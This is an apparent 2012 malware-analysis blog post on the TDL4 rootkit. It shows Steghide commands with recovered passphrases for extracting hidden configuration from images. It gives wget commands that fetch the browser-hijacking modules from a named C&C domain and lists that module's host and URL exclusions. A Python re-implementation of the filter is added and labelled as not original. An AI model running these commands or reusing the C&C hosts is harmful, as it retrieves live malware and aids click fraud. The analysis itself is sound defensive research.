Tuesday, 23 October 2012

Analysis of TDL4 (Part III)

More about steganography

A closer look at the COM32 component of TDL4, the component that decrypts configuration text from the JPEG images hosted at imageshack.us and posted into the blogs, reveals that COM32 is a rip-off of the open-source project Steghide, a steganography program developed by Stefan Hetzl.

Because COM32 is compiled from the publicly available source files, you don't even need to download the COM32 module to decrypt the images. Just download the Steghide software and run it against a JPEG image found on the TDL4 blogs.

For example, configuration text from the images 1, 2, and 3 can be recovered by running Steghide as:

steghide.exe extract -sf image.jpg -p A6rprm09lZnVsCn -xf config.txt

Text from another blog's images (4, 5, and 6) can be obtained by running Steghide as:

steghide.exe extract -sf image.jpg -p TOWasfO03gGff58 -xf config.txt

where A6rprm09lZnVsCn and TOWasfO03gGff58 are the passphrases obtained by decrypting the strings jt5G/KE25R1VSaYny0rr and m6dj7aA9mhQKdI8X3jy9 from the original configuration file with RC4 key #1.

BBR232/BBR264 and SERF332/SERF364

These additional modules are downloaded from the C&C servers and then loaded into the address space of the browsers. Their purpose is to hijack browsing activity: redirect users to various dodgy websites, skew Google search results, and serve pop-ups with fake AV products, porn, gambling sites, etc.

To fetch the modules from C&C, the following URL parameters are used:

mode=mod&filename=bbr232 encrypted as CehOKSsUCKLC3skBxcO9fFpCcHXx4Nlw
mode=mod&filename=serf332 encrypted as CehOKSsUCKLC3skBxcO9fFpCYXLxtNlxPw==

Thus, wget will fetch them when run as:

wget wahinotisifatu.com/?CehOKSsUCKLC3skBxcO9fFpCcHXx4Nlw -U "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.1) GeckaSeka/20090911 Firefox/3.5.1"
wget wahinotisifatu.com/?CehOKSsUCKLC3skBxcO9fFpCYXLxtNlxPw== -U "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.1) GeckaSeka/20090911 Firefox/3.5.1"

Once decrypted the same way as demonstrated in the previous blog post, BBR232 reveals itself as a module that hijacks the Internet Explorer, Chrome, Safari, Opera, and Firefox browsers. SERF332 is designed for Internet Explorer only, as it relies on parsing the window structure of the browser process. The BBR264 and SERF364 modules are designed to support 64-bit versions of the browsers.

For example, when processing an intercepted GET request, identified by the check shown in the listing below:

.text:100156E3 mov edi, ds:StrCmpNIA
.text:100156E9 push 4
.text:100156EB push offset aGet ; "GET "
.text:100156F0 push ebx
.text:100156F1 call edi ; StrCmpNIA
.text:100156F3 test eax, eax
.text:100156F5 jnz short check_POST_Request
.text:100156F7 mov edx, [esp+20h+var_10]
.text:100156FB push edx
.text:100156FC mov ecx, ebx
.text:100156FE call process_GET_request

BBR232 will make sure the host name does not contain any of the following strings:

  • yimg.

  • rds.yahoo.

  • google.

  • .google

  • bing.

  • yahoo.

  • atdmt.

  • aolcdn.

  • atwola.com

  • .aol.

  • dmn.aol.

  • sa.aol.

  • .icq.

  • dw.com.

  • .gstatic.

  • img.youtube.

  • i.i.com.

  • google-analytics.com

  • .everesttech.

  • .ixnp.

  • googleapis.

  • .alexametrics.

  • scorecardresearch.com

  • alltheweb.

  • altavista.

  • microsofttranslator.

  • microsofttranslator.

  • askcache.

  • searchapi.search.aol.

  • cc.msnscache.com

  • .googlehosted.com

  • gesualdo.alexa.

BBR232 will also make sure that the requested web page is not pre-fetched by the browser.

In addition, it makes sure the URL string does not include the following strings:

  • search/cache

  • /search/search

  • search/redir

  • counter.yadro.ru

  • gstatic.com/inputtools

  • recaptcha_ajax.js

  • icq.com/js/cookie_lib.js

  • survey.122.2o7.net

  • fls.doubleclick.net

  • alexa.com

  • facebook.
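The request filter described above (GET method, host-name substrings, the prefetch check, and the URL substrings), re-implemented in Python as an added example that is not part of the original post or of the TDL4 code. It lets an analyst scope captured proxy log lines by asking "would BBR232 have passed this request on to its redirect logic?". The log line format and the sample lines are constructed for this example, and the "prefetch" flag stands in for whatever prefetch detection the module actually performs, which the post does not describe.

```python
from urllib.parse import urlsplit

# Host-name substrings the module refuses to touch (list from the post).
HOST_EXCLUDES = (
    "yimg.", "rds.yahoo.", "google.", ".google", "bing.", "yahoo.", "atdmt.",
    "aolcdn.", "atwola.com", ".aol.", "dmn.aol.", "sa.aol.", ".icq.", "dw.com.",
    ".gstatic.", "img.youtube.", "i.i.com.", "google-analytics.com",
    ".everesttech.", ".ixnp.", "googleapis.", ".alexametrics.",
    "scorecardresearch.com", "alltheweb.", "altavista.", "microsofttranslator.",
    "askcache.", "searchapi.search.aol.", "cc.msnscache.com", ".googlehosted.com",
    "gesualdo.alexa.",
)
# Substrings anywhere in the URL that also make the module skip the request.
URL_EXCLUDES = (
    "search/cache", "/search/search", "search/redir", "counter.yadro.ru",
    "gstatic.com/inputtools", "recaptcha_ajax.js", "icq.com/js/cookie_lib.js",
    "survey.122.2o7.net", "fls.doubleclick.net", "alexa.com", "facebook.",
)

def is_hijack_candidate(method, url, prefetch=False):
    """True if the request passes every exclusion check and would reach
    BBR232's redirect/referer-replacement logic."""
    if method.upper() != "GET":            # StrCmpNIA "GET ", 4 chars, case-insensitive
        return False
    host = (urlsplit(url).hostname or "").lower()
    if any(s in host for s in HOST_EXCLUDES):
        return False
    if prefetch:                           # pre-fetched pages are left alone
        return False
    return not any(s in url.lower() for s in URL_EXCLUDES)

def scope_log(lines):
    """Classify constructed log lines of the form 'METHOD URL [prefetch]'."""
    results = []
    for line in lines:
        parts = line.split()
        prefetch = len(parts) > 2 and parts[2] == "prefetch"
        results.append((parts[1], is_hijack_candidate(parts[0], parts[1], prefetch)))
    return results

# Constructed sample proxy log (not real traffic).
SAMPLE_LOG = [
    "GET http://www.google.com/search?q=antivirus",         # host excluded
    "GET http://example-news.example/article/123",           # candidate
    "GET http://example-news.example/article/124 prefetch",  # prefetch, skipped
    "GET http://cdn.example/recaptcha_ajax.js",              # URL excluded
    "POST http://example-shop.example/cart",                 # not a GET
    "GET http://www.facebook.com/home.php",                  # URL contains "facebook."
]
```

Only the second line is a candidate; the rest are rejected by a different check each, which is a useful way to see how narrowly the module targets ordinary site visits while leaving the search engines and analytics hosts untouched.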

Next, BBR232 is able to modify the requested URL by replacing the HTTP referer in it, or by replacing some URL parameters such as "url=". The hijacking logic, i.e. what needs to be modified in the browser session, is defined by a configuration file, where page redirects and HTTP referer replacements are defined in the sections enclosed with the tags [redir_urls_begin]/[redir_urls_end] and [ref_replace_begin]/[ref_replace_end] respectively. The redirect configuration may potentially be fetched from the servers:

  • wanstatcteery.com

  • wahinotisifatu.com

  • owtotmyne.com

As a result, when the user clicks a link returned by Google Search, the "url=" parameter will be replaced with a different web page, leading to skewed analytics, fraudulent monetization via AdSense, clickjacking, Search Engine Optimisation (SEO) poisoning, and other click fraud that constitutes the "cash cow" business for the TDL/TDSS group.